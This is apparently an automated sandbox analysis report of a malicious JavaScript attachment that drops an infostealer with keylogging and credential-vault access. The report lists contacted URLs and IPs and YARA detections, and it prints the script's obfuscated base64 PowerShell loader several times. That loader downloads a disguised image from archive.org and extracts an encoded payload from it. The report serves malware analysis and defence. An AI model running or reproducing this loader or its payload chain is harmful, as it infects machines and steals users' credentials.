Source: powershell.exe, 00000002.00000002.1590939976.0000020211D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1590939976.0000020211D33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8D9111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1529607955.000001A8D94E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://epanpano.com
Source: powershell.exe, 00000004.00000002.1529607955.000001A8D94E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://epanpano.com/log/ORGN.txt
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DA992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DA0A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DA741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia601606.us.arX
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DA479000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8D9333000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia601606.us.archive.org
Source: powershell.exe, 00000002.00000002.1590939976.0000020212486000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote
Source: powershell.exe, 00000004.00000002.1568306343.000001A8F1340000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1527966232.000001A8D72A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DAA19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: RegAsm.exe, 00000007.00000002.2712744340.0000000006020000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697982737.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698787111.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2713398889.0000000006096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown	HTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.142.208.13:443 -> 192.168.2.8:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, gmBpn1ecBmQ.cs

.Net Code: cTytqmH

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.powershell.exe.1a8e949b578.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7564, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 9316
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 9316			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFB4AD90E0B	4_2_00007FFB4AD90E0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_011B4AC0	7_2_011B4AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_011BEE00	7_2_011BEE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_011BDE90	7_2_011BDE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_011B3EA8	7_2_011B3EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_011B41F0	7_2_011B41F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066B2428	7_2_066B2428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066BE048	7_2_066BE048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066C66C0	7_2_066C66C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066C5258	7_2_066C5258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066CC250	7_2_066CC250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066CB2F0	7_2_066CB2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066C3120	7_2_066C3120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066C7E50	7_2_066C7E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066C7770	7_2_066C7770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066CE470	7_2_066CE470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066C0040	7_2_066C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066C59AB	7_2_066C59AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_066C0007	7_2_066C0007

Source: INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js

Initial sample: Strings found which are bigger than 50

Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.powershell.exe.1a8e949b578.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Process Memory Space: powershell.exe PID: 7564, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, roEs93G.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, roEs93G.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, JQn0Aia1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, JQn0Aia1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, YsrmZ97b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, YsrmZ97b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, YsrmZ97b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, YsrmZ97b.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winJS@11/5@4/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqt2f2g2.wq0.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? 